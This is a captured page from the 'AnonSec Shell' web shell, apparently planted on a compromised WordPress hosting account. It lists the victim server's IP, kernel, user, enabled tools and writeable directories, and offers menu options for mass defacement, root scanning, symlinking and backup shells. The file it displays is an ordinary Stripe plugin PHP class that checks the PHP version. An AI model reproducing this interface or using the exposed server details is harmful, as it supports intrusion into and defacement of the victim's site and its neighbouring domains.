AnonSec Shell
Server IP : 144.76.79.100  /  Your IP : 216.73.216.103   [ Reverse IP ]
Web Server : Apache
System : Linux ch05.wehostwebserver.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User : razzlestore ( 1092)
PHP Version : 8.2.29
Disable Function : NONE
Domains : 343 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/razzlestore/public_html/wp-content/plugins/woo-stripe-payment/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/razzlestore/public_html/wp-content/plugins/woo-stripe-payment/src//PluginValidation.php
<?php

namespace PaymentPlugins\Stripe;

class PluginValidation {

	public static function is_valid( $callback ) {
		try {
			self::assert_php_version();

			$callback();
		} catch ( \Exception $e ) {
			self::add_admin_notice( $e->getMessage() );
		}
	}

	private static function assert_php_version() {
		if ( version_compare( PHP_VERSION, '5.6', '<' ) ) {
			throw new \Exception( sprintf( __( 'Your PHP version is %s but Stripe requires version 5.6+.', 'woo-stripe-payment' ), PHP_VERSION ) );
		}
	}

	private static function add_admin_notice( $msg ) {
		add_action( 'admin_notices', function () use ( $msg ) {
			?>
            <div class="notice notice-error woocommerce-message">
                <h4>
					<?php echo $msg ?>
                </h4>
            </div>
			<?php
		} );
	}

}

Anon7 - 2022
AnonSec Team